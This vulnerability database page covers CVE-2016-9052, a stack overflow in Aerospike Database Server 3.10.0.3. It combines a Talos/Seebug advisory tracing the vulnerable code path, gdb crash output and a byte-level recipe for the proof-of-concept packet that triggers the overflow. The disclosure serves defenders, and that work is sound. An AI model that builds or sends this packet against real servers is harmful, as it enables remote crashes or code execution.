Vulnerabilities > CVE-2016-9052 - Out-of-bounds Write vulnerability in Aerospike Database Server 3.10.0.3
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function as_sindex__simatch_by_iname resulting in remote code execution. An attacker can simply connect to the port to trigger this vulnerability.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Common Weakness Enumeration (CWE)
Seebug
bulletinFamily | exploit |
description | ### Summary An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function `as_sindex__simatch_by_iname` resulting in remote code execution. An attacker can simply connect to the port to trigger this vulnerability. ### Tested Versions Aerospike Database Server 3.10.0.3 ### Product URLs https://github.com/aerospike/aerospike-server/tree/3.10.0.3 ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-121 - Stack-based Buffer Overflow ### Details Aerospike Database Server is both a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in ram with the ability to persist data to a solid-state drive or traditional rotational media. When processing a packet from the client, the server will execute the `thr_demarshal` function. After accepting a connection on the socket, the server will read the header from the packet and check it's protocol type. If its protocol type specifies that the packet is compressed (PROTOTYPEASMSGCOMPRESSED), it will decompress it with zlib and then continue to process the packet [1]. Later, when the protocol type is PROTOTYPEAS_MSG the server will pass the packet to the `thr_tsvc_process_or_enqueue` function [2]. ``` as/src/base/thr_demarshal.c:389 void * thr_demarshal(void *unused) { ... // Demarshal transactions from the socket. ... // Iterate over all events. for (i = 0; i < nevents; i++) { ... // If pointer is NULL, then we need to create a transaction and // store it in the buffer. if (fd_h->proto == NULL) { ... // Do a preliminary read of the header into a stack- // allocated structure, so that later on we can allocate the // entire message buffer. if (0 >= (n = cf_socket_recv(sock, &proto, sizeof(as_proto), MSG_WAITALL))) { cf_detail(AS_DEMARSHAL, "proto socket: read header fail: error: rv %d sz was %d errno %d", n, sz, errno); goto NextEvent_FD_Cleanup; } ... // Check for a finished read. if (0 == fd_h->proto_unread) { ... // Check if it's compressed. if (tr.msgp->proto.type == PROTO_TYPE_AS_MSG_COMPRESSED) { // [1] ... } ... // Either process the transaction directly in this thread, // or queue it for processing by another thread (tsvc/info). if (0 != thr_tsvc_process_or_enqueue(&tr)) { // [2] cf_warning(AS_DEMARSHAL, "Failed to queue transaction to the service thread"); goto NextEvent_FD_Cleanup; } ``` The `thr_tsvc_process_or_enqueue` function will first read the namespace from the packet then and check to see the data is configured to be stored in memory by calling the `as_msg_peek_data_in_memory` function [1]. If the namespace is undefined or configured to not be stored in memory, the function will continue by calling into `process_transaction` [2]. In order to trigger this particular vulnerability, this is the path that must be taken. ``` as/src/base/thr_tsvc.c:497 int thr_tsvc_process_or_enqueue(as_transaction *tr) { // If transaction is for data-in-memory namespace, process in this thread. if (g_config.allow_inline_transactions && g_config.n_namespaces_in_memory != 0 && (g_config.n_namespaces_not_in_memory == 0 || as_msg_peek_data_in_memory(&tr->msgp->msg))) { // [1] process_transaction(tr); // [2] return 0; } ... ``` Inside the `process_transaction` function, the server will use the string defined by the ASMSGFIELDTYPENAMESPACE field to determine the namespace. Once the namespace is discovered, the server will determine what type of transaction request is being made. This is done by checking which fields are defined. After determining the transaction is a multi-record type by checking that the ASMSGFIELDBITKEY and ASMSGFIELDBITDIGESTRIPE fields are not included [1], the transaction will be checked to see if it's a batched transaction. This is done by checking to see if the ASMSGFIELDBITDIGESTRIPEARRAY is included [2]. Finally after checking for those fields, the function will call `as_transaction_is_query` [3]. The `as_transaction_is_query` function will then check for the ASMSGFIELDBITINDEXRANGE field being set and if so will pass execution to the `as_query` function at [4]. ``` as/src/base/thr_tsvc.c:71 void process_transaction(as_transaction *tr) { ... // All transactions must have a namespace. as_msg_field *nf = as_msg_field_get(m, AS_MSG_FIELD_TYPE_NAMESPACE); ... as_namespace *ns = as_namespace_get_bymsgfield(nf); ... if (as_transaction_is_multi_record(tr)) { // [1] \ ... if (as_transaction_is_batch_direct(tr)) { // [2] \ ... } else if (as_transaction_is_query(tr)) { // [3] \ // Query. ... if (as_query(tr, ns) != 0) { // [4] ... \ [1] as/include/base/transaction.h:265 static inline bool as_transaction_is_multi_record(const as_transaction *tr) { return (tr->msg_fields & (AS_MSG_FIELD_BIT_KEY | AS_MSG_FIELD_BIT_DIGEST_RIPE)) == 0 && (tr->from_flags & FROM_FLAG_BATCH_SUB) == 0; } \ [2] as/include/base/transaction.h:272 static inline bool as_transaction_is_batch_direct(const as_transaction *tr) { // Assumes we're already multi-record. return (tr->msg_fields & AS_MSG_FIELD_BIT_DIGEST_RIPE_ARRAY) != 0; } \ [3] as/include/base/transaction.h:265 static inline bool as_transaction_is_query(const as_transaction *tr) { // Assumes we're already multi-record. return (tr->msg_fields & AS_MSG_FIELD_BIT_INDEX_RANGE) != 0; } ``` At the beginning of the `as_query` function, the application will hand-off the transaction to the `query_setup` function [1]. Inside this function, the server will ensure that the requested namespace has a secondary index associated with it by calling the `as_sindex_ns_has_sindex` [2]. After this is determined, the namespace and the packet itself will be passed to the `as_sindex_from_msg` function [3]. ``` as/src/base/thr_query.c:2856 int as_query(as_transaction *tr, as_namespace *ns) { if (tr) { QUERY_HIST_INSERT_DATA_POINT(query_txn_q_wait_hist, tr->start_time); } as_query_transaction *qtr; int rv = query_setup(tr, ns, &qtr); // [1] \ ... \ as/src/base/thr_query.c:2686 static int query_setup(as_transaction *tr, as_namespace *ns, as_query_transaction **qtrp) { ... bool has_sindex = as_sindex_ns_has_sindex(ns); // [2] if (!has_sindex) { tr->result_code = AS_PROTO_RESULT_FAIL_INDEX_NOTFOUND; cf_debug(AS_QUERY, "No Secondary Index on namespace %s", ns->name); goto Cleanup; } // TODO - still lots of redundant msg field parsing (e.g. for set) - fix. if ((si = as_sindex_from_msg(ns, &tr->msgp->msg)) == NULL) { // [3] cf_debug(AS_QUERY, "No Index Defined in the Query"); } ``` Upon receiving the namespace and the packet, the server will extract the fields identified by the enumerations ASMSGFIELDTYPEINDEXNAME [1] and ASMSGFIELDTYPESET [2] from the packet. Afterwards, the string stored in the ASMSGFIELDTYPEINDEXNAME field is then passed to the `as_sindex_lookup_by_iname` function [3]. ``` as/src/base/secondary_index.c:2591 as_sindex * as_sindex_from_msg(as_namespace *ns, as_msg *msgp) { cf_debug(AS_SINDEX, "as_sindex_from_msg"); as_msg_field *ifp = as_msg_field_get(msgp, AS_MSG_FIELD_TYPE_INDEX_NAME); // [1] as_msg_field *sfp = as_msg_field_get(msgp, AS_MSG_FIELD_TYPE_SET); // [2] ... iname = cf_strndup((const char *)ifp->data, as_msg_field_get_value_sz(ifp)); as_sindex *si = as_sindex_lookup_by_iname(ns, iname, AS_SINDEX_LOOKUP_FLAG_ISACTIVE); // [3] ``` Both the `ns` representing the namespace and the `iname` variable containing the secondary index name extracted from the packet will then be passed to the `as_sindex_lookup_by_iname`. This server will continue to hand-off these arguments through the function call at [2] and then at [3]. ``` as/src/base/secondary_index.c:1068 as_sindex * as_sindex_lookup_by_iname(as_namespace *ns, char * iname, char flag) { return as_sindex__lookup(ns, iname, NULL, -1, 0, 0, NULL, flag); // [1] \ } \ as/src/base/secondary_index.c:1058 as_sindex * as_sindex__lookup(as_namespace *ns, char *iname, char *set, int binid, as_sindex_ktype type, as_sindex_type itype, char * path, char flag) { SINDEX_GRLOCK(); as_sindex *si = as_sindex__lookup_lockfree(ns, iname, set, binid, type, itype, path, flag); // [2] \ SINDEX_GUNLOCK(); return si; } \ as/src/base/secondary_index.c:1003 as_sindex * as_sindex__lookup_lockfree(as_namespace *ns, char *iname, char *set, int binid, as_sindex_ktype type, as_sindex_type itype, char * path, char flag) { ... int simatch = -1; as_sindex *si = NULL; // If iname is not null then search in iname hash and store the simatch if (iname) { simatch = as_sindex__simatch_by_iname(ns, iname); // [3] } ... ``` Finally the `as_sindex__simatch_by_iname` function will be called with the namespace and secondary index name from the packet. This function will write the index name to the `iname` buffer which has a maximum size of 0x100 bytes [1]. The index name is then written into the buffer using `snprintf` and a buffer length based on the `strlen` of the string within the packet [2]. Due to the server using the length of the string from the packet as the bounds for the buffer instead of the size of the buffer itself, a stack-based buffer overflow can be made to occur. ``` as/include/base/datamodel.h:129 #define AS_ID_INAME_SZ 256 as/src/base/secondary_index.c:982 int as_sindex__simatch_by_iname(as_namespace *ns, char *idx_name) { int simatch = -1; char iname[AS_ID_INAME_SZ]; memset(iname, 0, AS_ID_INAME_SZ); // [1] snprintf(iname, strlen(idx_name) + 1, "%s", idx_name); // [2] int rv = shash_get(ns->sindex_iname_hash, (void *)iname, (void *)&simatch); cf_detail(AS_SINDEX, "Found iname simatch %s->%d rv=%d", iname, simatch, rv); if (rv) { return -1; } return simatch; } ``` ### Crash Information ``` # gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2` ... (gdb) b as_sindex__simatch_by_iname Breakpoint 5 at 0x506331: file base/secondary_index.c, line 985. (gdb) c Continuing. [Switching to Thread 0x7f8d0cf77700 (LWP 43832)] Breakpoint 5, as_sindex__simatch_by_iname (ns=0x7f8d92983010, idx_name=0x7f8d040c4300 'A' <repeats 200 times>...) at base/secondary_index.c:985 985 int simatch = -1; (gdb) next 986 char iname[AS_ID_INAME_SZ]; memset(iname, 0, AS_ID_INAME_SZ); (gdb) next 987 snprintf(iname, strlen(idx_name) + 1, "%s", idx_name); (gdb) p sizeof(iname) $1 = 0x100 (gdb) p strlen(idx_name)+1 $2 = 0x201 (gdb) dq $rbp L2 7f8d0cf73460 | 00007f8d0cf734c0 0000000000506497 | .4.......dP..... (gdb) next 988 int rv = shash_get(ns->sindex_iname_hash, (void *)iname, (void *)&simatch); (gdb) dq $rbp L1 7f8d0cf73460 | 4242424242424242 4242424242424242 | BBBBBBBBBBBBBBBB (gdb) finish Run till exit from #0 as_sindex__simatch_by_iname (ns=0x4242424242424242, idx_name=0x4242424242424242 <Address 0x4242424242424242 out of bounds>) at base/secondary_index.c:988 Warning: Cannot insert breakpoint 0. Error accessing memory address 0x4242424242424242: Input/output error. ``` ### Exploit Proof-of-Concept To execute the provided proof-of-concept, simply extract and run it as follows: ``` $ python poc hostname:3000 $namespace Trying to connect to hostname:3000 Sending 0x232 byte packet... done. ``` A client packet for Aerospike server has the following structure. The first 2 bytes describe the protocol `version` and the protocol `type`. The `version` must be 0x02, where the protocol `type` can be one of two values. If ASCOMPRESSEDMSG(0x04) is specified, then the contents of `data` are zlib-encoded. Otherwise, the AS_MSG(0x03) value is used. The size of this data is defined by the `sz` field which is a 48-bit unsigned integer. ``` <class aspie.as_proto_s> [0] <instance aspie.proto_version 'version'> v2(0x2) [1] <instance aspie.proto_type 'type'> AS_MSG(0x3) [2] <instance uint48_t 'sz'> +0x00000000022e (558) [8] <instance aspie.as_msg_s 'data'> "\x00\x00\x00\x00\x00\x00\x00 ..skipped ~538 bytes.. \x42\x42\x42\x42\x42\x42\x42" ``` The contents of the `data` field has the following structure. In order to submit a message that passes the checks at `as_transaction_is_multi_record` and `as_transaction_is_query`, There simply needs to be a field with the NAMESPACE(0x0) id, one with an INDEXRANGE(0x16) id, and no fields that use the BITKEY(2) or BITDIGESTRIPE(4) identifiers. The field that is being used to overflow with is using the INDEXNAME(0x15) id. This means that there must be at least three fields defined and thus the uint16t field `n_fields` must be set to 0x0003 or more. ``` <class aspie.as_msg_s> 'data' [8] <instance uint8_t 'header_sz'> +0x00 (0) [9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8) [a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8) [b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8) [c] <instance uint8_t 'unused'> +0x00 (0) [d] <instance uint8_t 'result_code'> +0x00 (0) [e] <instance uint32_t 'generation'> +0x00000000 (0) [12] <instance uint32_t 'record_ttl'> +0x00000000 (0) [16] <instance uint32_t 'transaction_ttl'> +0x00000000 (0) [1a] <instance uint16_t 'n_fields'> +0x0003 (3) [1c] <instance uint16_t 'n_ops'> +0x0000 (0) [1e] <instance array(aspie.as_msg_field_s,3) 'fields'> aspie.as_msg_field_s[3] "\x00\x00\x00\x09\x00\x58\x58 ..skipped ~516 bytes.. \x42\x42\x42\x42\x42\x42\x42" [236] <instance array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] "" ``` Af offset 0x1e of the packet is the definition of `fields`. This is an array of fields that provide options for the type of request that is being made. The field identified by NAMESPACE(0x0) contains a namespace that supports the configuration defined above. ``` <class aspie.as_msg_field_s> '0' [1e] <instance uint32_t 'field_sz'> +0xXXXXXXXX (X) [22] <instance aspie.AS_MSG_FIELD_TYPE 'type'> NAMESPACE(0x0) [23] <instance aspie.as_msg_namespace_s<char_t> 'data'> ... ``` One of the requirements is that an INDEX_RANGE(0x16) field must be defined. This begins at offset 0x2b of the packet generated by the proof-of-concept. ``` <class aspie.as_msg_field_s> '1' [2b] <instance uint32_t 'field_sz'> +0x00000002 (2) [2f] <instance aspie.AS_MSG_FIELD_TYPE 'type'> INDEX_RANGE(0x16) [30] <instance aspie.as_msg_index_range_s 'data'> "\x00" ``` The last field that is used to overflow the 0x100 byte buffer has the identifier of INDEX_NAME(0x15). As long as the length defined in `field_sz` is larger than 0x200 (exclusive) and the contents of `data` contains the same number of bytes, this vulnerability is being triggered. ``` <class aspie.as_msg_field_s> '2' [31] <instance uint32_t 'field_sz'> +0x00000201 (513) [35] <instance aspie.AS_MSG_FIELD_TYPE 'type'> INDEX_NAME(0x15) [36] <instance aspie.as_msg_index_name_s<char_t> 'data'> ... ``` ### Timeline * 2016-12-23 - Vendor Disclosure * 2017-01-09 - Public Release ### CREDIT * Discovered by the Cisco Talos Team. |
id | SSV:96588 |
last seen | 2017-11-19 |
modified | 2017-09-26 |
published | 2017-09-26 |
reporter | Root |
title | Aerospike Database Server Index Name Code Execution Vulnerability(CVE-2016-9052) |
Talos
id | TALOS-2016-0266 |
last seen | 2019-05-29 |
published | 2017-01-09 |
reporter | Talos Intelligence |
source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0266 |
title | Aerospike Database Server Index Name Code Execution Vulnerability |